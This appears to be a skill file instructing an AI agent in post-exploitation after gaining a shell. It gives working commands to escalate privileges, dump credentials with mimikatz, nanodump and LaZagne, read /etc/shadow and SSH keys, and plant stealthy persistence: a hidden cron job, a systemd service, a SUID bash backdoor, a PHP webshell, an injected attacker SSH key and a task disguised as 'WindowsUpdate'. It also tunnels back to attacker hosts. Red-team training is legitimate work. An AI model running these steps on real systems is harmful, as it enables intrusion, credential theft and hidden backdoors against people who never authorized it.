aeondave/post-exploit-technique

Post-Exploit Technique

Goal: move from low-privilege shell to full host control, harvest credentials, establish persistence, and set up lateral movement — reproducibly and with minimal noise.

When this technique applies

• Initial shell obtained (reverse shell, webshell, RCE via vuln-exploit-technique).
• Need to escalate from www-data/low-user to root/SYSTEM.
• Need to extract credentials for lateral movement.
• Need to maintain access across reboots.
• Need to pivot into internal network segments.
• Need to evaluate cloud, Kubernetes, or CI/CD credentials discovered from a host or repository foothold.

Boundary with other skills

• Input from vuln-exploit-technique: stable shell, known user, target OS.
• Lateral movement to AD targets: load active-directory-technique for domain attacks.
• Network pivoting mechanics: use references/pivoting.md for tunnel setup, forwarding, SOCKS chains, and double pivots; keep network-technique for broader network investigation logic.
• Offensive coding: custom payloads, BOF, shellcode → offensive-coding/ skills.

Tool families

| Need | Skill | |---|---| | Shell payload generation | offensive-tools/shells/revshells/, offensive-tools/shells/revshellgen/ | | Shell stabilization and file transfer | offensive-tools/linux/pwncat/, offensive-tools/windows/evil-winrm/ | | Linux privesc triage | offensive-tools/linux/linpeas/, offensive-tools/linux/linux-exploit-suggester/ | | Windows privesc triage | offensive-tools/windows/winpeas/, offensive-tools/windows/privesccheck/, offensive-tools/windows/watson/ | | Credential harvest | offensive-tools/windows/mimikatz/, offensive-tools/windows/nanodump/, offensive-tools/windows/lazagne/, offensive-tools/linux/mimipenguin/ | | Pivoting | offensive-tools/network/ligolo-ng/, offensive-tools/network/chisel/ | | Windows/AD protocol actions | offensive-tools/windows/impacket/, offensive-tools/windows/crackmapexec/ |

Initial triage

Before escalating or harvesting broadly, classify the foothold and choose the shortest path to higher privilege or next-hop access.

• Starting state: what OS and privilege level do you have, how stable is the shell, and is the host standalone, domain-joined, cloud-hosted, or part of a larger enclave?
• First questions: what local escalation paths are realistic, what credentials may exist here, what defenses are active, and does the mission require privilege, persistence, pivoting, or all three?
• Immediate actions: stabilize the shell, capture host context, and rank one privesc path, one credential path, and one pivot path before acting.
• Tool-family direction: use stabilization and privesc triage skills first (pwncat, evil-winrm, linpeas, winpeas, privesccheck, watson), then credential-harvest skills, then pivot and AD-oriented tools once the credential type and target path are known.
• Escalation rule: do not mix privilege escalation, persistence, and lateral movement simultaneously; confirm each stage before moving to the next.
• Pivoting rule: if the next objective is on an unreachable subnet, set up and validate the pivot before running downstream enumeration or exploitation.

Agent operating model

Loop:
  1. Stabilize shell and confirm context.
  2. Situational awareness — OS, user, network, defenses.
  3. Local privilege escalation — automated triage → manual confirmation.
  4. Credential harvest — dump, search, capture.
  5. Persistence — survive reboot, evade cleanup.
  6. Lateral movement prep — pivot routes, credential handoff.

Stop when: root/SYSTEM achieved, credentials for next hop secured, persistence confirmed.

Do not skip shell stabilization — unstable shells cause false negatives in enumeration tools.

---

Phase 1 — Shell stabilization

Convert dumb reverse shell to interactive TTY before running any tools.

# Python PTY upgrade (Linux)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → reset; export TERM=xterm

# Script method
script /dev/null -c bash

# pwncat-cs (recommended — auto-upgrades and handles file transfer)
pwncat-cs -lp 4444

Windows:

# evil-winrm gives full PTY over WinRM
evil-winrm -i <target> -u <user> -p <pass>

# pwncat (Windows target via netcat reverse shell)
# Upgrade via powershell conPTY support

See offensive-tools/shells/revshells/ for shell generation, offensive-tools/shells/revshellgen/ for generators, offensive-tools/linux/pwncat/ for stabilization, and offensive-tools/windows/evil-winrm/ for WinRM sessions.

---

Phase 2 — Situational awareness

Run before any escalation attempt. Answers: who am I, what is this host, what is reachable?

# Identity and privilege
id; whoami; groups; sudo -l; cat /etc/passwd | grep -v nologin

# OS and kernel
uname -a; cat /etc/os-release; lsb_release -a 2>/dev/null

# Network context
ip a; ip r; cat /etc/hosts; ss -tnlp; arp -n

# Running processes
ps aux; systemctl list-units --type=service

# Interesting files quick check
find / -perm -u=s -type f 2>/dev/null        # SUID binaries
find / -writable -type f 2>/dev/null | grep -v proc | head -30
crontab -l; ls /etc/cron*

Windows equivalent:

whoami /all; net user; net localgroup administrators
systeminfo; hostname; ipconfig /all; route print
netstat -ano; tasklist /v

---

Phase 3 — Local privilege escalation

Linux

Run automated triage first, then confirm manually.

Automated:

# linpeas — comprehensive Linux privesc triage
curl -sL https://linpeas.sh | bash   # or upload and run
./linpeas.sh -a 2>/dev/null | tee /tmp/linpeas.out

# linux-exploit-suggester — kernel exploit matching
./linux-exploit-suggester.sh
./linux-exploit-suggester-2.sh -k $(uname -r)

See offensive-tools/linux/linpeas/, offensive-tools/linux/linux-exploit-suggester/.

Manual priority checklist:

- [ ] sudo -l → NOPASSWD entries → GTFOBins for that binary
- [ ] SUID/SGID binaries → GTFOBins check
- [ ] Writable /etc/passwd or /etc/sudoers
- [ ] Cron jobs running as root with writable script/path
- [ ] Writable service unit files
- [ ] PATH hijacking: relative command in root-owned script
- [ ] Capabilities: getcap -r / 2>/dev/null
- [ ] NFS no_root_squash mounts
- [ ] Docker group membership → docker run -v /:/host escape
- [ ] Kernel exploit: check CVEs for exact kernel version

→ Full patterns: references/linux-privesc.md.

Windows

Automated:

# winpeas — comprehensive Windows privesc triage
.\winPEASx64.exe > winpeas.out

# privesccheck
Import-Module .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended | Tee-Object privesc.out

# watson — patch-level missing CVEs
.\Watson.exe

See offensive-tools/windows/winpeas/, offensive-tools/windows/privesccheck/, offensive-tools/windows/watson/.

Manual priority checklist:

- [ ] AlwaysInstallElevated: both HKCU+HKLM set → msi payload
- [ ] Unquoted service paths with writable directory
- [ ] Weak service/file permissions (icacls on service binary)
- [ ] SeImpersonatePrivilege / SeAssignPrimaryToken → Potato family
- [ ] SeBackupPrivilege → read SAM/SYSTEM/NTDS.dit
- [ ] Writable registry run keys
- [ ] Scheduled tasks running as SYSTEM with writable binary
- [ ] DLL hijacking: service with missing DLL in writable path
- [ ] UAC bypass: check UAC level, known bypass techniques
- [ ] Stored credentials: cmdkey /list, credential manager

→ Full patterns: references/windows-privesc.md.

---

Phase 4 — Credential harvesting

Extract credentials for current host and lateral movement.

Linux

# Memory credential dump
./mimipenguin.sh              # dump plaintext from memory (root required)

# SSH key harvest
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
cat ~/.ssh/authorized_keys; ls ~/.ssh/

# Config files with credentials
find / -name "*.conf" -o -name "*.env" -o -name "*.cfg" 2>/dev/null | xargs grep -l "password\|passwd\|secret\|token" 2>/dev/null | head -20
grep -r "DB_PASS\|DB_PASSWORD\|mysql_connect\|PDO" /var/www/ 2>/dev/null

# Shadow file (if root)
cat /etc/shadow; unshadow /etc/passwd /etc/shadow > unshadowed.txt  # then hashcat/john

# Browser/app credentials
find / -name "*.sqlite" -path "*firefox*" -o -name "Login Data" -path "*chrome*" 2>/dev/null

See offensive-tools/linux/mimipenguin/, offensive-tools/linux/ssh-key-scanner/.

Windows

# Mimikatz — primary Windows credential dump
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit"

# Nanodump — LSASS dump (stealthier than mimikatz direct)
.\nanodump.exe -w lsass.dmp
# Transfer dump, then parse locally with mimikatz

# LaZagne — multi-source credential harvest (browsers, apps, wifi, DB)
.\lazagne.exe all

# Credential Manager dump
cmdkey /list
.\mimikatz.exe "vault::cred" "vault::list" "exit"

# SAM/SYSTEM offline (if SeBackupPrivilege or volume shadow)
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Transfer and parse: python3 secretsdump.py -sam sam.bak -system system.bak LOCAL

See offensive-tools/windows/mimikatz/, offensive-tools/windows/nanodump/, offensive-tools/windows/lazagne/.

→ Full credential sources and parsing: references/credential-harvest.md.

Cloud and CI/CD credentials require different handling: record token expiry, tenant/project scope, effective permissions, and audit-log footprint before use. For managed identities, service principals, CI variables, OIDC tokens, Kubernetes service accounts, and serverless deploy paths, use references/cloud-and-cicd-post-exploit.md.

---

Phase 5 — Persistence

Survive reboots and cleanup attempts.

Linux persistence patterns

# Cron persistence
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.svc >/dev/null 2>&1") | crontab -

# Systemd service
cat > /etc/systemd/system/svc.service << EOF
[Unit]
After=network.target
[Service]
ExecStart=/tmp/.svc
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable svc.service --now

# SSH key injection (if /root/.ssh writable)
echo "ssh-rsa AAAA... attacker_key" >> /root/.ssh/authorized_keys

# SUID shell backdoor (if root)
cp /bin/bash /tmp/.bash; chmod +s /tmp/.bash
# Access: /tmp/.bash -p

# Webshell persistence
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/.config.php

See offensive-tools/linux/linux-persistence/.

Windows persistence patterns

# Registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svc /t REG_SZ /d "C:\Users\Public\svc.exe"

# Scheduled task (SYSTEM)
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\svc.exe" /sc onstart /ru SYSTEM /f

# Service installation
sc create svc binpath= "C:\Windows\Temp\svc.exe" start= auto
sc start svc

# WMI event subscription (fileless, stealthy)
# See references/persistence.md for WMI persistence

# Golden ticket (domain) → load active-directory-technique

See offensive-tools/shells/weevely3/ for webshell persistence.

→ Full patterns by OS and stealth level: references/persistence.md.

Cloud or pipeline persistence (IAM credentials, serverless triggers, Kubernetes jobs, protected CI variables, deploy keys) is covered in references/cloud-and-cicd-post-exploit.md; prefer scoped, reversible proofs and avoid broad tenant-wide changes unless explicitly authorized.

---

Phase 6 — Lateral movement prep

Set up pivoting and credential handoff for next hops.

Pivot setup

# ligolo-ng (recommended — transparent proxy, full routing)
# On attacker: ./proxy -selfcert -laddr 0.0.0.0:11601
# On target:   ./agent -connect <attacker>:11601 -ignore-cert
# Then route internal subnet through tunnel

# chisel (HTTP tunnel, useful through restrictive firewalls)
# Attacker: ./chisel server -p 8080 --reverse
# Target:   ./chisel client <attacker>:8080 R:socks

# proxychains — route tools through SOCKS proxy (system tool; no dedicated repo skill yet)
# Edit /etc/proxychains4.conf → socks5 127.0.0.1 1080
# Then: proxychains nmap -sT -Pn 10.10.10.0/24

See references/pivoting.md for transport selection, egress-driven tunnel choice, double pivots, and validation flow. Use offensive-tools/network/ligolo-ng/ and offensive-tools/network/chisel/ for tool-specific operation.

Credential handoff

• NTLM hashes → pass-the-hash via offensive-tools/windows/crackmapexec/ or offensive-tools/windows/impacket/ (load active-directory-technique)
• Plaintext passwords → spray across internal services (SSH, WinRM, SMB)
• Kerberos tickets → pass-the-ticket (load active-directory-technique)
• SSH keys → try against all discovered internal SSH services

→ Full lateral movement patterns: references/lateral-movement.md.

---

Quality gates

• Shell is stable and TTY before running enumeration tools.
• All privesc findings manually confirmed before exploitation.
• Credential dumps verified to parse correctly before transfer.
• Persistence tested across reboot simulation where possible.
• Pivot tunnel validated with a test connection before routing full scan.
• Pivot method selected by egress and tool need.

Anti-patterns

• Running linpeas/winpeas without stabilized shell → output corruption.
• Escalating directly to root without documenting the path → unreproducible.
• Storing dumps/credentials on target disk unencrypted.
• Establishing persistence with obvious binary names / cron comments.
• Passing hashes or tickets without confirming target service accepts that auth method.

Resources

• references/linux-privesc.md — Linux privesc vector catalog: sudo, SUID, cron, capabilities, kernel exploits, Docker/LXC, NFS.
• references/windows-privesc.md — Windows privesc vector catalog: service abuse, token impersonation, Potato family, DLL hijacking, UAC bypass.
• references/credential-harvest.md — Linux and Windows credential sources, dump methods, parsing, and handoff format.
• references/persistence.md — Linux/Windows persistence by stealth tier: cron/systemd, registry/tasks, WMI, webshell, kernel-level.
• references/cloud-and-cicd-post-exploit.md — Cloud credential triage, CI/CD runner/repository footholds, serverless/Kubernetes persistence, and scoped proof discipline.
• references/lateral-movement.md — Lateral movement decision model: pivot route selection, credential type → protocol → tool mapping, SMB/SSH/WinRM/RDP patterns.
• references/pivoting.md — Pivoting transport selection and setup: ligolo-ng, chisel, SSH, socat, netsh portproxy, DNS/ICMP tunnels, double pivots, and validation rules.